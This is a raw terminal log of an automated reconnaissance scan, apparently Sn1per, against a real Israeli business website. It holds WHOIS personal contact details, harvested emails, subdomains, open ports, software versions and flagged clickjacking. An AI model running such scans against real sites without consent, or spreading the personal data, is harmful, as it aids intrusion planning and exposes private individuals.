- address: Ofer Bar
- address: Kibutz Hulda
- address: Kibutz Hulda
- address: 11111
- address: Israel
- phone: +972 54 3035371
- fax-no: +972 9 9574370
- e-mail: tsahye AT gmail.com
- nic-hdl: IS-OB5539-IL
- changed: domain-registrar AT isoc.org.il 20130904
- changed: Managing Registrar 20150805
- person: Interspace Domreg
- address: Interspace Ltd.
- address: P.O.Box 8723
- address: Netanya
- address: 42505
- address: Israel
- phone: +972 73 2224444
- fax-no: +972 73 2224440
- e-mail: domreg AT interspace.net
- nic-hdl: IS-ID1078-IL
- changed: Managing Registrar 20070110
- changed: Managing Registrar 20070319
- changed: Managing Registrar 20070909
- changed: Managing Registrar 20090514
- changed: Managing Registrar 20110720
- changed: Managing Registrar 20110720
- changed: Managing Registrar 20110721
- changed: Managing Registrar 20111128
- changed: Managing Registrar 20111128
- changed: Managing Registrar 20130924
- changed: Managing Registrar 20130924
- changed: Managing Registrar 20130924
- changed: Managing Registrar 20130924
- changed: Managing Registrar 20130924
- changed: Managing Registrar 20170518
- changed: Managing Registrar 20170716
- registrar name: InterSpace Ltd
- registrar info: http://www.internic.co.il
- % Rights to the data above are restricted by copyright.
- [92m + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +[0m
- *******************************************************************
- * *
- * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
- * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
- * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
- * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
- * *
- * TheHarvester Ver. 2.7 *
- * Coded by Christian Martorella *
- * Edge-Security Research *
- * cmartorella@edge-security.com *
- *******************************************************************
- Full harvest..
- [-] Searching in Google..
- Searching 0 results...
- Searching 100 results...
- Searching 200 results...
- [-] Searching in PGP Key server..
- [-] Searching in Bing..
- Searching 50 results...
- Searching 100 results...
- Searching 150 results...
- Searching 200 results...
- [-] Searching in Exalead..
- Searching 50 results...
- Searching 100 results...
- Searching 150 results...
- Searching 200 results...
- Searching 250 results...
- [+] Emails found:
- ------------------
- info@flybox.co.il
- liron@flybox.co.il
- [+] Hosts found in search engines:
- ------------------------------------
- [-] Resolving hostnames IPs...
- 104.31.75.239:www.flybox.co.il
- [+] Virtual hosts:
- ==================
- 104.31.75.239 hoc
- 104.31.75.239 www.flybox.co.il
- 104.31.75.239 www.fedsmith
- 104.31.75.239 www.isadanislam.org
- 104.31.75.239 hocltd.com
- 104.31.75.239 www.fedsmith.com
- ******************************************************
- * /\/\ ___| |_ __ _ __ _ ___ ___ / _(_) | *
- * / \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
- * / /\/\ \ __/ || (_| | (_| | (_) | (_) | _| | | *
- * \/ \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
- * |___/ *
- * Metagoofil Ver 2.2 *
- * Christian Martorella *
- * Edge-Security.com *
- * cmartorella_at_edge-security.com *
- ******************************************************
- [-] Starting online search...
- [-] Searching for doc files, with a limit of 200
- Searching 100 results...
- Searching 200 results...
- Results: 0 files found
- Starting to download 50 of them:
- ----------------------------------------
- [-] Searching for pdf files, with a limit of 200
- Searching 100 results...
- Searching 200 results...
- Results: 0 files found
- Starting to download 50 of them:
- ----------------------------------------
- [-] Searching for xls files, with a limit of 200
- Searching 100 results...
- Searching 200 results...
- Results: 0 files found
- Starting to download 50 of them:
- ----------------------------------------
- [-] Searching for csv files, with a limit of 200
- Searching 100 results...
- Searching 200 results...
- Results: 0 files found
- Starting to download 50 of them:
- ----------------------------------------
- [-] Searching for txt files, with a limit of 200
- Searching 100 results...
- Searching 200 results...
- Results: 0 files found
- Starting to download 50 of them:
- ----------------------------------------
- processing
- user
- email
- [+] List of users found:
- --------------------------
- [+] List of software found:
- -----------------------------
- [+] List of paths and servers found:
- ---------------------------------------
- [+] List of e-mails found:
- ----------------------------
- [92m + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +[0m
- ; <<>> DiG 9.11.2-5-Debian <<>> -x flybox.co.il
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 61983
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;il.co.flybox.in-addr.arpa. IN PTR
- ;; AUTHORITY SECTION:
- in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102519 1800 900 604800 3600
- ;; Query time: 489 msec
- ;; SERVER: 192.168.1.254#53(192.168.1.254)
- ;; WHEN: Sun Dec 31 03:23:31 EST 2017
- ;; MSG SIZE rcvd: 122
- dnsenum VERSION:1.2.4
- [1;34m
- ----- flybox.co.il -----
- [0m[1;31m
- Host's addresses:
- __________________
- [0mflybox.co.il. 211 IN A 104.31.74.239
- flybox.co.il. 211 IN A 104.31.75.239
- [1;31m
- Name Servers:
- ______________
- [0mvin.ns.cloudflare.com. 84028 IN A 173.245.59.245
- athena.ns.cloudflare.com. 67779 IN A 173.245.58.72
- [1;31m
- Mail (MX) Servers:
- ___________________
- [0maspmx3.googlemail.com. 293 IN A 209.85.202.26
- alt1.aspmx.l.google.com. 293 IN A 64.233.186.26
- aspmx.l.google.com. 293 IN A 209.85.232.26
- aspmx2.googlemail.com. 293 IN A 64.233.186.26
- alt2.aspmx.l.google.com. 293 IN A 209.85.202.26
- [1;31m
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- [0m
- Trying Zone Transfer for flybox.co.il on vin.ns.cloudflare.com ...
- Trying Zone Transfer for flybox.co.il on athena.ns.cloudflare.com ...
- brute force file not specified, bay.
- [92m + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +[0m
- [91m
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|[0m[93m
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [94m[-] Enumerating subdomains now for flybox.co.il[0m
- [93m[-] verbosity is enabled, will show the subdomains results in realtime[0m
- [92m[-] Searching now in Baidu..[0m
- [92m[-] Searching now in Yahoo..[0m
- [92m[-] Searching now in Google..[0m
- [92m[-] Searching now in Bing..[0m
- [92m[-] Searching now in Ask..[0m
- [92m[-] Searching now in Netcraft..[0m
- [92m[-] Searching now in DNSdumpster..[0m
- [92m[-] Searching now in Virustotal..[0m
- [92m[-] Searching now in ThreatCrowd..[0m
- [92m[-] Searching now in SSL Certificates..[0m
- [92m[-] Searching now in PassiveDNS..[0m
- [91mSSL Certificates: [0mvip.flybox.co.il
- [91mSSL Certificates: [0mwww.flybox.co.il
- [91mYahoo: [0mwww.flybox.co.il
- [91mYahoo: [0mvip.flybox.co.il
- [91mVirustotal: [0mvip.flybox.co.il
- [91mVirustotal: [0mlanding.flybox.co.il
- [91mVirustotal: [0mwww.flybox.co.il
- [91mDNSdumpster: [0mwww.flybox.co.il
- [91mBing: [0mvip.flybox.co.il
- [91mGoogle: [0mvip.flybox.co.il
- [93m[-] Saving results to file: [0m[91m/usr/share/sniper/loot/domains/domains-flybox.co.il.txt[0m
- [93m[-] Total Unique Subdomains Found: 3[0m
- [92mwww.flybox.co.il[0m
- [92mlanding.flybox.co.il[0m
- [92mvip.flybox.co.il[0m
- [91m ââââŠââââŠââââ⊠âŠ[0m
- [91m â â âŠâ â ââââ ââ£[0m
- [91m ââââ©ââ â©oââââ© â©[0m
- [91m + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +[0m
- [94m
- *.flybox.co.il
- vip.flybox.co.il
- www.flybox.co.il
- [91m [+] Domains saved to: /usr/share/sniper/loot/domains/domains-flybox.co.il-full.txt
- [0m
- [92m + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +[0m
- [92m + -- ----------------------------=[Checking Email Security]=----------------- -- +[0m
- [92m + -- ----------------------------=[Pinging host]=---------------------------- -- +[0m
- PING flybox.co.il(2400:cb00:2048:1::681f:4bef (2400:cb00:2048:1::681f:4bef)) 56 data bytes
- 64 bytes from 2400:cb00:2048:1::681f:4bef (2400:cb00:2048:1::681f:4bef): icmp_seq=1 ttl=60 time=29.3 ms
- --- flybox.co.il ping statistics ---
- 1 packets transmitted, 1 received, 0% packet loss, time 0ms
- rtt min/avg/max/mdev = 29.300/29.300/29.300/0.000 ms
- [92m + -- ----------------------------=[Running TCP port scan]=------------------- -- +[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 03:24 EST
- Nmap scan report for flybox.co.il (104.31.74.239)
- Host is up (0.30s latency).
- Other addresses for flybox.co.il (not scanned): 2400:cb00:2048:1::681f:4aef 2400:cb00:2048:1::681f:4bef 104.31.75.239
- Not shown: 468 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 80/tcp open http
- 443/tcp open https
- 8080/tcp open http-proxy
- 8443/tcp open https-alt
- 8880/tcp open cddbp-alt
- Nmap done: 1 IP address (1 host up) scanned in 17.31 seconds
- [92m + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +[0m
- [91m + -- --=[Port 21 closed... skipping.[0m
- [91m + -- --=[Port 22 closed... skipping.[0m
- [91m + -- --=[Port 23 closed... skipping.[0m
- [91m + -- --=[Port 25 closed... skipping.[0m
- [91m + -- --=[Port 53 closed... skipping.[0m
- [91m + -- --=[Port 79 closed... skipping.[0m
- [93m + -- --=[Port 80 opened... running tests...[0m
- [92m + -- ----------------------------=[Checking for WAF]=------------------------ -- +[0m
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://flybox.co.il
- The site http://flybox.co.il is behind a CloudFlare
- Number of requests: 1
- [92m + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +[0m
- [1m[34mhttp://flybox.co.il[0m [301 Moved Permanently] [1m[37mCloudFlare[0m, [1m[37mCookies[0m[[37m__cfduid[0m], [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mHTTPServer[0m[[1m[36mcloudflare[0m], [1m[37mHttpOnly[0m[[37m__cfduid[0m], [1m[37mIP[0m[[37m104.31.75.239[0m], [1m[37mRedirectLocation[0m[[37mhttps://flybox.co.il/[0m], [1m[37mTitle[0m[[1m[33m301 Moved Permanently[0m], [1m[37mUncommonHeaders[0m[[37mcf-ray[0m]
- [1m[34mhttps://flybox.co.il/[0m [301 Moved Permanently] [1m[37mCloudFlare[0m, [1m[37mCookies[0m[[37mPHPSESSID,__cfduid,qtrans_front_language[0m], [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mHTTPServer[0m[[1m[36mcloudflare[0m], [1m[37mHttpOnly[0m[[37m__cfduid[0m], [1m[37mIP[0m[[37m104.31.75.239[0m], [1m[37mPHP[0m[[1m[32m7.0.13[0m], [1m[37mRedirectLocation[0m[[37mhttps://www.flybox.co.il/[0m], [1m[37mUncommonHeaders[0m[[37mcf-ray[0m], [1m[37mX-Powered-By[0m[[37mPHP/7.0.13[0m]
- [1m[34mhttps://www.flybox.co.il/[0m [200 OK] [1m[37mCloudFlare[0m, [1m[37mCookies[0m[[37mPHPSESSID,__cfduid,qtrans_front_language[0m], [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mFrame[0m, [1m[37mGoogle-Analytics[0m[[1m[32mUniversal[0m][[1m[36mUA-87930745-1[0m], [1m[37mHTML5[0m, [1m[37mHTTPServer[0m[[1m[36mcloudflare[0m], [1m[37mHttpOnly[0m[[37m__cfduid[0m], [1m[37mIP[0m[[37m104.31.75.239[0m], [1m[37mJQuery[0m[[1m[32m1.0.5,2.1.3[0m], [1m[37mMetaGenerator[0m[[37mWooCommerce 2.5.5,WordPress 4.5.6,qTranslate-X 3.4.6.8[0m], [1m[37mOpen-Graph-Protocol[0m[[1m[32mwebsite[0m], [1m[37mPHP[0m[[1m[32m7.0.13[0m], [1m[37mScript[0m[[37mapplication/ld+json,text/javascript[0m], [1m[37mTitle[0m[[1m[33mFlybox - ××ךק׊×× ××ך×× ××× ××ש׀×× ××××ך××! ×× ×ךת ך×× ××××¢× ××שך××[0m], [1m[37mUncommonHeaders[0m[[37mlink,access-control-allow-origin,cf-ray[0m], [1m[37mVimeo[0m, [1m[37mWordPress[0m[[1m[32m4.5.6[0m], [1m[37mX-Powered-By[0m[[37mPHP/7.0.13[0m], [1m[37mX-UA-Compatible[0m[[37mIE=edge[0m]
- [94m __ ______ _____ [0m
- [94m \ \/ / ___|_ _|[0m
- [94m \ /\___ \ | | [0m
- [94m / \ ___) || | [0m
- [94m /_/\_|____/ |_| [0m
- [94m+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield[0m
- [94m+ -- --=[Target: flybox.co.il:80[0m
- [92m+ -- --=[Site not vulnerable to Cross-Site Tracing![0m
- [92m+ -- --=[Site not vulnerable to Host Header Injection![0m
- [91m+ -- --=[Site vulnerable to Cross-Frame Scripting![0m
- [91m+ -- --=[Site vulnerable to Clickjacking![0m
- [93mHTTP/1.1 405 Not Allowed
- Date: Sun, 31 Dec 2017 08:24:32 GMT
- Content-Type: text/html
- Content-Length: 177
- Connection: close
- Server: cloudflare-nginx
- CF-RAY: -
- <html>
- <head><title>405 Not Allowed</title></head>
- <body bgcolor="white">
- <center><h1>405 Not Allowed</h1></center>
- <hr><center>cloudflare-nginx</center>
- </body>
- </html>
- [0m
- [93mHTTP/1.1 301 Moved Permanently
- Date: Sun, 31 Dec 2017 08:24:33 GMT
- Content-Type: text/html; charset=iso-8859-1
- Transfer-Encoding: chunked
- Connection: keep-alive
- Set-Cookie: __cfduid=d3b25843681417713efeeea362ec03e091514708673; expires=Mon, 31-Dec-18 08:24:33 GMT; path=/; domain=.flybox.co.il; HttpOnly
- Location: https://flybox.co.il/
- Server: cloudflare
- CF-RAY: 3d5bd7d943b108e4-CDG
- e5
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>301 Moved Permanently</title>
- </head><body>
- <h1>Moved Permanently</h1>
- <p>The document has moved <a href="https://flybox.co.il/">here</a>.</p>
- </body></html>
- 0
- [0m
- [92m + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +[0m
- [94m+ -- --=[Checking if X-Content options are enabled on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking if X-Frame options are enabled on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking if X-XSS-Protection header is enabled on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking HTTP methods on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking if TRACE method is enabled on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking for META tags on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking for open proxy on flybox.co.il...[0m [93m
- </div><!-- /#cf-wrapper -->
- <script type="text/javascript">
- window._cf_translation = {};
- </script>
- </body>
- </html>
- [94m+ -- --=[Enumerating software on flybox.co.il...[0m [93m
- Server: cloudflare
- [94m+ -- --=[Checking if Strict-Transport-Security is enabled on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking for Flash cross-domain policy on flybox.co.il...[0m [93m
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>301 Moved Permanently</title>
- </head><body>
- <h1>Moved Permanently</h1>
- <p>The document has moved <a href="https://flybox.co.il/crossdomain.xml">here</a>.</p>
- </body></html>
- [94m+ -- --=[Checking for Silverlight cross-domain policy on flybox.co.il...[0m [93m
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>301 Moved Permanently</title>
- </head><body>
- <h1>Moved Permanently</h1>
- <p>The document has moved <a href="https://flybox.co.il/clientaccesspolicy.xml">here</a>.</p>
- </body></html>
- [94m+ -- --=[Checking for HTML5 cross-origin resource sharing on flybox.co.il...[0m [93m
- [94m+ -- --=[Retrieving robots.txt on flybox.co.il...[0m [93m
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>301 Moved Permanently</title>
- </head><body>
- <h1>Moved Permanently</h1>
- <p>The document has moved <a href="https://flybox.co.il/robots.txt">here</a>.</p>
- </body></html>
- [94m+ -- --=[Retrieving sitemap.xml on flybox.co.il...[0m [93m
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>301 Moved Permanently</title>
- </head><body>
- <h1>Moved Permanently</h1>
- <p>The document has moved <a href="https://flybox.co.il/sitemap.xml">here</a>.</p>
- </body></html>
- [94m+ -- --=[Checking cookie attributes on flybox.co.il...[0m [93m
- Set-Cookie: __cfduid=d9bbe540dd477159e31148488172304ef1514708677; expires=Mon, 31-Dec-18 08:24:37 GMT; path=/; domain=.flybox.co.il; HttpOnly
- [94m+ -- --=[Checking for ASP.NET Detailed Errors on flybox.co.il...[0m [93m
- jQuery("input#footernewsletter").removeClass("error")
- jQuery("input#footernewsletter").addClass("error")
- if( returned_data.result == 'error' ) {
- <body class="rtl error404">
- [0m
- [92m + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +[0m
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 104.31.75.239
- + Target Hostname: flybox.co.il
- + Target Port: 80
- + Start Time: 2017-12-31 03:24:41 (GMT-5)
- ---------------------------------------------------------------------------
- + Server: cloudflare
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'cf-ray' found, with contents: 3d5bd80e62396908-CDG
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + All CGI directories 'found', use '-C none' to test none
- + Server banner has changed from 'cloudflare' to 'cloudflare-nginx' which may suggest a WAF, load balancer or proxy is in place
- + Scan terminated: 17 error(s) and 3 item(s) reported on remote host
- + End Time: 2017-12-31 05:16:15 (GMT-5) (6694 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- [92m + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +[0m
- [91m[+][0m Screenshot saved to /usr/share/sniper/loot/screenshots/flybox.co.il-port80.jpg
- [92m + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +[0m
- [92m + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +[0m
- [1;35m _____ [1;37m .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. [0;31m.1BR'''Yp, .8BR'''Cq.
- [1;35m (_____)[1;37m 01 01N. C 01 C 01 .01. 01 [1;31m 01 Yb 01 .01.
- [1;35m (() ())[1;37m 01 C YCb C 01 C 01 ,C9 01 [0;31m 01 dP 01 ,C9
- [1;35m \ / [1;37m 01 C .CN. C 01 C 0101dC9 01 [1;31m 01'''bg. 0101dC9
- [1;35m \ / [1;37m 01 C .01.C 01 C 01 YC. 01 , [0;31m 01 .Y 01 YC.
- [1;35m /=\ [1;37m 01 C Y01 YC. ,C 01 .Cb. 01 ,C [1;31m 01 ,9 01 .Cb.
- [1;35m [___] [1;37m .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C [0;31m.J0101Cd9 .J01L. .J01./ [1;37m2.1
- [1;37m__[ ! ] Neither war between hackers, nor peace for the system.
- [1;37m__[ ! ] [02;31mhttp://blog.inurl.com.br
- [1;37m__[ ! ] [02;31mhttp://fb.com/InurlBrasil
- [1;37m__[ ! ] [02;31mhttp://twitter.com/@googleinurl[0m
- [1;37m__[ ! ] [02;31mhttp://github.com/googleinurl[0m
- [1;37m__[ ! ] [02;31mCurrent PHP version::[ [1;37m7.0.26-1 [02;31m][0m
- [1;37m__[ ! ] [02;31mCurrent script owner::[ [1;37mroot [02;31m][0m
- [1;37m__[ ! ] [02;31mCurrent uname::[ [1;37mLinux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 [02;31m][0m
- [1;37m__[ ! ] [02;31mCurrent pwd::[ [1;37m/usr/share/sniper [02;31m][0m
- [1;37m__[ ! ] [1;33mHelp: php inurlbr.php --help[0m
- [1;37m------------------------------------------------------------------------------------------------------------------------[0m
- [1;37m[ ! ] Starting SCANNER INURLBR 2.1 at [31-12-2017 05:18:24][0;37m
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program[0m
- [1;37m[ INFO ][02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-flybox.co.il.txt ][0m
- [1;37m[ INFO ][0m[02;31m[ DORK ]::[1;37m[ site:flybox.co.il ]
- [1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [1;37m{[0m
- [1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE - www.google.vu ][0m
- [1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
- [1;37m-[02;31m[[0;31m:::[02;31m][0m
- [1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE API ][0m
- [1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
- [1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m
- [1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE_GENERIC_RANDOM - www.google.com.cu ID: 003917828085772992913:gmoeray5sa8 ][0m
- [1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
- [1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m
- [1;37m[ INFO ][0;31m[ TOTAL FOUND VALUES ]::[1;37m [ 100 ][0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 0 / 100 [1;37m][0;37m-[05:18:36][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 1 / 100 [1;37m][0;37m-[05:18:37][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 2 / 100 [1;37m][0;37m-[05:18:38][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/events/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 3 / 100 [1;37m][0;37m-[05:18:38][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/×ק׊××¢× ××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 4 / 100 [1;37m][0;37m-[05:18:38][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/restaurant/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 5 / 100 [1;37m][0;37m-[05:18:39][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/××_××××_××¢××£/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 6 / 100 [1;37m][0;37m-[05:18:39][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/××××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 7 / 100 [1;37m][0;37m-[05:18:40][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/kids/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
